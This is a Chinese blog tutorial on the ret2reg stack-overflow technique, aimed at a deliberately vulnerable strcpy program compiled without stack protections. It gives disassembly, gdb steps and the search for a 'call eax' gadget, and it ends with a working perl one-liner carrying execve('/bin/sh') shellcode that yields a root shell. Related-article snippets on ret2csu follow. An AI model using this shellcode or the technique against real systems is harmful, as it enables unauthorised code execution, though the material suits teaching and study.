中级ROP之ret2reg

最新推荐文章于 2023-09-05 13:57:26 发布
最新推荐文章于 2023-09-05 13:57:26 发布
阅读量2.8k 收藏 4
点赞数 3
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acsuccess/article/details/104465113
版权

ret2reg

原理

  1. 查看栈溢出返回时哪个寄存器指向缓冲区空间。
  2. 查找对应的call 寄存器或者jmp 寄存器指令,将EIP设置为该指令地址。
  3. 将寄存器所指向的空间上注入shellcode(确保该空间是可以执行的,通常是栈上的)
利用思路
  • 分析和调试汇编,查看溢出函数返回时哪个寄存器指向缓冲区地址
  • 向寄存器指向的缓冲区中注入shellcode
  • 查找call 该寄存器或者jmp 该寄存器指令,并将该指令地址覆盖ret
防御方法

在函数ret之前,将所有赋过值的寄存器全部复位,清0,以避免此类漏洞

Example

此类漏洞常见于strcpy字符串拷贝函数中。

源程序
#include <stdio.h>
#include <string.h>
void evilfunction(char *input) {
        char buffer[512];
        strcpy(buffer, input);
}
int main(int argc, char **argv) {
        evilfunction(argv[1]);
        return 0;
}
编译

开启地址随机化(ASLR)

echo 2 > /proc/sys/kernel/randomize_va_space

进行编译

gcc -Wall -g -o ret2reg ret2reg.c -z execstack -m32 -fno-stack-protector
checksec + IDA分析
[*] '/mnt/hgfs/ubuntu_share/pwn/interrop/ret2reg'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments


int __cdecl main(int argc, const char **argv, const char **envp)
{
  evilfunction((char *)argv[1]);
  return 0;
}
void __cdecl evilfunction(char *input)
{
  char buffer[512]; // [esp+0h] [ebp-208h]

  strcpy(buffer, input);
}
  • 可以看出,程序将argv[1]对应的字符串拷贝进了buffer中,argv[1]就是程序接收的命令行参数。
./ret2reg 123123
  • 123123就是我们输入的第一个命令行参数,其中 $argv[0] 就是脚本文件名,argc[1]为输入的第一个参数
  • 返回evilfunction函数的汇编指令
.text:0804840B                 push    ebp
.text:0804840C                 mov     ebp, esp
.text:0804840E                 sub     esp, 208h
.text:08048414                 sub     esp, 8
.text:08048417                 push    [ebp+input]     ; src
.text:0804841A                 lea     eax, [ebp+buffer]
.text:08048420                 push    eax             ; dest
.text:08048421                 call    _strcpy
.text:08048426                 add     esp, 10h
.text:08048429                 nop
.text:0804842A                 leave
.text:0804842B                 retn
  • 可以看到,lea eax,[ebp+buffer],该指令就是将[ebp + buffer]的偏移地址送给eax,也就相当于eax指向了buffer缓冲区的位置
  • 这时我们就可以向buffer中写入shellcode,并且找到call eax指令地址来覆盖ret,从而拿到shell
  • 这时我们需要查看evilfunction函数返回时,eax是不是还指向缓冲区地址
  • 使用gdb进行调试带参数的程序

gdb --args ret2reg 123123
b *0x0804842B
r

  • 可见eax的值仍为缓冲区的地址
  • 接下来查找call eax或者jmp eax指令
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/interrop# objdump -d ret2reg | grep *%eax
 8048373:	ff d0                	call   *%eax
  • payload就可以构造出来了

payload = shellcode + (0x208 + 4 - len(shellcode)) * a + p32(0x8048373)
Exp
  • 使用prel命令即可打通
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/interrop# ./ret2reg $(perl -e 'printf "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80" . "A"x499 ."\x73\x83\x04\x08"')
# id
uid=0(root) gid=0(root) groups=0(root)
西杭
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
FPGA——reg2reg路径的时序分析
08-04
本文主要对FPGA的reg2reg路径的时序进行了详细的分析,并列写了时间余量的相关公式。
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 2718
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
PWN-ret2csu
recover517的博客
12-06 508
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
ret2csu
qq_29317353的博客
09-05 198
ret2csu学习,buu level5
pwn中级ROP——ret2csu
turtlesd的博客
04-27 764
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
rop轻松谈.pdf
10-21
rop基础
rop开放平台
04-12
rop开放平台s
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
[email protected]
09-09
lorem ipsm dolor sit amet
11、时序分析基础
zj_xlink的博客
08-08 1405
时序分析基础
FPGA静态时序分析基础(二)
weixin_42750542的博客
03-21 1384
在上一篇文章中讲述了静态时序分析的概念,以及其分类,即主要分为四种:reg2reg、reg2pin、pin2reg、pin2pin,这一篇文章就来细致分析一下reg2reg的时序分析。 首先看上面这张图,给出以下定义: reg1:源寄存器,即信号发出端 reg2:目标寄存器,即信号接收端 Tclk1:时钟源到达reg1的延迟 Tclk2:时钟源到达reg2的延迟 Tdata:数据从源寄存器到目标寄存器的传播延时 Tco:Tclk1到达源寄存器至信号发出之间的延时 Tsu:数据建立时间 Th:数据保持时间
好好说话之ret2csu
hollk’s blog
06-22 5580
一、x64寄存器 在64位程序中,函数的前6各参数是通过寄存器传递的,可以看到rdi作为第一个参数,rsi作为第二个参数,rdx作为第三个参数,rcx作为第四个参数,r8作为第五个参数,r9作为第六个参数。也就是说在函数调用参数的时候会依次在六个寄存器中寻找,如果参数多余6个,那么就需要在栈中寻找。 63 31 ...
中级ROP
m0_49959202的博客
09-23 440
文章目录中级ROP1.原理1.1 ret2csu1.1.1 libc_csu_init展示1.1.2 可用gadget介绍1.1.3 组合使用gadget思路1.1.4 类似于libc_csu_init,其他可用的gadget1.1.5 利用libc_csu_init尾部偏移,控制其他寄存器1.2 ret2reg1.2.1 原理1.2.2 防御方法1.3 BROP1.3.1 概念1.3.2 攻击条件1.3.3 攻击原理1.3.3.1 栈溢出长度1.3.3.2 Stack Reading1.3.3.3 Bli
使用ret2reg攻击绕过地址混淆
海枫的专栏
02-07 7110
本文介绍ret2reg攻击方法,可以绕过地址混淆安全技术
好好说话之re2reg
热门推荐
hollk’s blog
06-22 1万+
一、原理: 查看溢出函数返回时哪个寄存器指向溢出缓冲区 查找call reg或者jmp reg指令,将EIP设置为指令地址 reg所指向的空间上植入shellcode(确保该空间是可以执行的) 二、BROP BROP(Blind ROP)瞎几把ROP,用在看不到程序C代码和二进制文件的情况下,对程序进行攻击,劫持程序的执行流。就有点像SQL注入当中的盲注,不会直接看到关键的信息,需要一个一个的...
中级 rop
weixin_55885866的博客
05-18 65
第一步:利用write()输出write在内存中的地址。gadget是call qword ptr [r12+rbx*8],所以应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。链接:https://www.jianshu.com/p/187798890345。商业转载请联系作者获得授权,非商业转载请注明出处。作者:Queen_耳又又。
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

西杭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值